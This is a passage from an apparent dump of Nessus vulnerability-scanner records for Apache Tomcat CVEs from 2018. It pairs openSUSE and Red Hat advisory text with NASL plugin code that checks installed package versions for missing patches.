/ tomcat8-admin-webapps / tomcat8-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:09:23", "description": "This update for tomcat to version 9.0.10 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-1336: An improper handing of overflow in the UTF-8 decoder with supplementary characters could have lead to an infinite loop in the decoder causing a Denial of Service (bsc#1102400).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings (bsc#1093697).\n\n - CVE-2018-8034: The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could have resulted in a user seeing a response intended for a different user. An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also have resulted in a user seeing a response intended for another user (bsc#1102410).\n\nBug fixes :\n\n - Avoid overwriting of customer's configuration during update (bsc#1067720)\n\n - Disable adding OSGi metadata to JAR files\n\n - See changelog at http://tomcat.apache.org/tomcat-9.0-doc/changelog.html#T omcat_9.0.10_(markt)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : tomcat (openSUSE-2019-770)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1336", "CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:tomcat-lib", "p-cpe:/a:novell:opensuse:tomcat-servlet-4_0-api", "p-cpe:/a:novell:opensuse:tomcat-webapps", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:tomcat", "p-cpe:/a:novell:opensuse:tomcat-admin-webapps", "p-cpe:/a:novell:opensuse:tomcat-docs-webapp", "p-cpe:/a:novell:opensuse:tomcat-el-3_0-api", "p-cpe:/a:novell:opensuse:tomcat-embed", "p-cpe:/a:novell:opensuse:tomcat-javadoc", "p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api", "p-cpe:/a:novell:opensuse:tomcat-jsvc"], "id": "OPENSUSE-2019-770.NASL", "href": "https://www.tenable.com/plugins/nessus/123330", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-770.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123330);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-1336\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n\n script_name(english:\"openSUSE Security Update : tomcat (openSUSE-2019-770)\");\n script_summary(english:\"Check for the openSUSE-2019-770 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for tomcat to version 9.0.10 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-1336: An improper handing of overflow in the\n UTF-8 decoder with supplementary characters could have\n lead to an infinite loop in the decoder causing a Denial\n of Service (bsc#1102400).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings\n (bsc#1093697).\n\n - CVE-2018-8034: The host name verification when using TLS\n with the WebSocket client was missing. It is now enabled\n by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the\n application at the same time as the container triggered\n the async timeout, a race condition existed that could\n have resulted in a user seeing a response intended for a\n different user. An additional issue was present in the\n NIO and NIO2 connectors that did not correctly track the\n closure of the connection when an async request was\n completed by the application and timed out by the\n container at the same time. This could also have\n resulted in a user seeing a response intended for\n another user (bsc#1102410).\n\nBug fixes :\n\n - Avoid overwriting of customer's configuration during\n update (bsc#1067720)\n\n - Disable adding OSGi metadata to JAR files\n\n - See changelog at\n http://tomcat.apache.org/tomcat-9.0-doc/changelog.html#T\n omcat_9.0.10_(markt)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n # http://tomcat.apache.org/tomcat-9.0-doc/changelog.html#Tomcat_9.0.10_(markt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8887ec3f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1067720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1093697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102410\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-el-3_0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-servlet-4_0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-admin-webapps-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-docs-webapp-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-el-3_0-api-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-embed-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-javadoc-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-jsp-2_3-api-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-jsvc-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-lib-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-servlet-4_0-api-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-webapps-9.0.10-lp150.2.3.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:24:20", "description": "An update for the pki-deps:10.6 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe Public Key Infrastructure (PKI) Deps module contains fundamental packages required as dependencies for the pki-core module by Red Hat Certificate System.\n\nSecurity Fix(es) :\n\n* tomcat: Due to a mishandling of close in NIO/NIO2 connectors user sessions can get mixed up (CVE-2018-8037)\n\n* tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Open redirect in default servlet (CVE-2018-11784)\n\n* tomcat: Host name verification missing in WebSocket client (CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {}, "published": "2019-06-19T00:00:00", "type": "nessus", "title": "RHEL 8 : pki-deps:10.6 (RHSA-2019:1529)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11784", "CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2022-02-01T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apache-commons-collections", "p-cpe:/a:redhat:enterprise_linux:apache-commons-lang", "p-cpe:/a:redhat:enterprise_linux:bea-stax-api", "p-cpe:/a:redhat:enterprise_linux:glassfish-fastinfoset", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-api", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-core", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-runtime", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-txw2", "p-cpe:/a:redhat:enterprise_linux:jackson-annotations", "p-cpe:/a:redhat:enterprise_linux:pki-servlet-container", "p-cpe:/a:redhat:enterprise_linux:python-nss-debugsource", "p-cpe:/a:redhat:enterprise_linux:python-nss-doc", "p-cpe:/a:redhat:enterprise_linux:jackson-core", "p-cpe:/a:redhat:enterprise_linux:python3-nss", "p-cpe:/a:redhat:enterprise_linux:jackson-databind", "p-cpe:/a:redhat:enterprise_linux:relaxngdatatype", "p-cpe:/a:redhat:enterprise_linux:jackson-jaxrs-json-provider", "p-cpe:/a:redhat:enterprise_linux:resteasy", "p-cpe:/a:redhat:enterprise_linux:slf4j", "p-cpe:/a:redhat:enterprise_linux:jackson-jaxrs-providers", "p-cpe:/a:redhat:enterprise_linux:slf4j-jdk14", "p-cpe:/a:redhat:enterprise_linux:jackson-module-jaxb-annotations", "p-cpe:/a:redhat:enterprise_linux:stax-ex", "p-cpe:/a:redhat:enterprise_linux:velocity", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-httpclient", "p-cpe:/a:redhat:enterprise_linux:xalan-j2", "p-cpe:/a:redhat:enterprise_linux:xerces-j2", "p-cpe:/a:redhat:enterprise_linux:xml-commons-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver", "p-cpe:/a:redhat:enterprise_linux:javassist", "p-cpe:/a:redhat:enterprise_linux:xmlstreambuffer", "p-cpe:/a:redhat:enterprise_linux:xsom", "p-cpe:/a:redhat:enterprise_linux:javassist-javadoc", "cpe:/o:redhat:enterprise_linux:8", "cpe:/o:redhat:enterprise_linux:8.0", "p-cpe:/a:redhat:enterprise_linux:pki-servlet-4.0-api"], "id": "REDHAT-RHSA-2019-1529.NASL", "href": "https://www.tenable.com/plugins/nessus/126030", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2019:1529. The text\n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(126030);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/01\");\n\n script_cve_id(\n \"CVE-2018-8014\",\n \"CVE-2018-8034\",\n \"CVE-2018-8037\",\n \"CVE-2018-11784\"\n );\n script_xref(name:\"RHSA\", value:\"2019:1529\");\n\n script_name(english:\"RHEL 8 : pki-deps:10.6 (RHSA-2019:1529)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for the pki-deps:10.6 module is now available for Red Hat\nEnterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe Public Key Infrastructure (PKI) Deps module contains fundamental\npackages required as dependencies for the pki-core module by Red Hat\nCertificate System.\n\nSecurity Fix(es) :\n\n* tomcat: Due to a mishandling of close in NIO/NIO2 connectors user\nsessions can get mixed up (CVE-2018-8037)\n\n* tomcat: Insecure defaults in CORS filter enable\n'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Open redirect in default servlet (CVE-2018-11784)\n\n* tomcat: Host name verification missing in WebSocket client\n(CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:1529\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-8014\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-8034\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-8037\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-11784\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bea-stax-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-fastinfoset\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-txw2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jackson-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jackson-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jackson-databind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jackson-jaxrs-json-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jackson-jaxrs-providers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jackson-module-jaxb-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-httpclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pki-servlet-4.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pki-servlet-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-nss-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-nss-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:relaxngDatatype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:slf4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:slf4j-jdk14\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:stax-ex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:velocity\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xalan-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xmlstreambuffer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xsom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 8.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nmodule_ver = get_kb_item('Host/RedHat/appstream/pki-deps');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module pki-deps:10.6');\nif ('10.6' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module pki-deps:' + module_ver);\n\nappstreams = {\n 'pki-deps:10.6': [\n {'reference':'apache-commons-collections-3.2.2-10.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'apache-commons-lang-2.6-21.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'bea-stax-api-1.2.0-16.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'glassfish-fastinfoset-1.2.13-9.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'glassfish-jaxb-api-2.2.12-8.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'glassfish-jaxb-core-2.2.11-11.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'glassfish-jaxb-runtime-2.2.11-11.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'glassfish-jaxb-txw2-2.2.11-11.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'jackson-annotations-2.9.8-1.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'jackson-core-2.9.8-1.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'jackson-databind-2.9.8-1.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'jackson-jaxrs-json-provider-2.9.8-1.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'jackson-jaxrs-providers-2.9.8-1.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'jackson-module-jaxb-annotations-2.7.6-4.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'jakarta-commons-httpclient-3.1-28.module+el8.0.0+3248+9d514f3b', 'release':'8', 'epoch':'1'},\n {'reference':'javassist-3.18.1-8.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'javassist-javadoc-3.18.1-8.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'pki-servlet-4.0-api-9.0.7-14.module+el8.0.0+3248+9d514f3b', 'release':'8', 'epoch':'1'},\n {'reference':'pki-servlet-container-9.0.7-14.module+el8.0.0+3248+9d514f3b', 'release':'8', 'epoch':'1'},\n {'reference':'python-nss-debugsource-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'aarch64', 'release':'8'},\n {'reference':'python-nss-debugsource-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'s390x', 'release':'8'},\n {'reference':'python-nss-debugsource-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'x86_64', 'release':'8'},\n {'reference':'python-nss-doc-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'aarch64', 'release':'8'},\n {'reference':'python-nss-doc-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'s390x', 'release':'8'},\n {'reference':'python-nss-doc-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'x86_64', 'release':'8'},\n {'reference':'python3-nss-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'aarch64', 'release':'8'},\n {'reference':'python3-nss-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'s390x', 'release':'8'},\n {'reference':'python3-nss-1.0.1-10.module+el8.0.0+3248+9d514f3b', 'cpu':'x86_64', 'release':'8'},\n {'reference':'relaxngDatatype-2011.1-7.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'resteasy-3.0.26-3.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'slf4j-1.7.25-4.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'slf4j-jdk14-1.7.25-4.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'stax-ex-1.7.7-8.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'velocity-1.7-24.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'xalan-j2-2.7.1-38.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'xerces-j2-2.11.0-34.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'xml-commons-apis-1.4.01-25.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'xml-commons-resolver-1.2-26.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'xmlstreambuffer-1.5.4-8.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'xsom-0-19.20110809svn.module+el8.0.0+3248+9d514f3b', 'release':'8'}\n ],\n};\n\nflag = 0;\nappstreams_found = 0;\nforeach module (keys(appstreams)) {\n appstream = NULL;\n appstream_name = NULL;\n appstream_version = NULL;\n appstream_split = split(module, sep:':', keep:FALSE);\n if (!empty_or_null(appstream_split)) {\n appstream_name = appstream_split[0];\n appstream_version = appstream_split[1];\n if (!empty_or_null(appstream_name)) appstream = get_one_kb_item('Host/RedHat/appstream/' + appstream_name);\n }\n if (!empty_or_null(appstream) && appstream_version == appstream || appstream_name == 'all') {\n appstreams_found++;\n foreach package_array ( appstreams[module] ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n }\n }\n}\n\nif (!appstreams_found) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module pki-deps:10.6');\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'apache-commons-collections / apache-commons-lang / bea-stax-api / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:28:15", "description": "From Red Hat Security Advisory 2019:1529 :\n\nAn update for the pki-deps:10.6 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe Public Key Infrastructure (PKI) Deps module contains fundamental packages required as dependencies for the pki-core module by Red Hat Certificate System.\n\nSecurity Fix(es) :\n\n* tomcat: Due to a 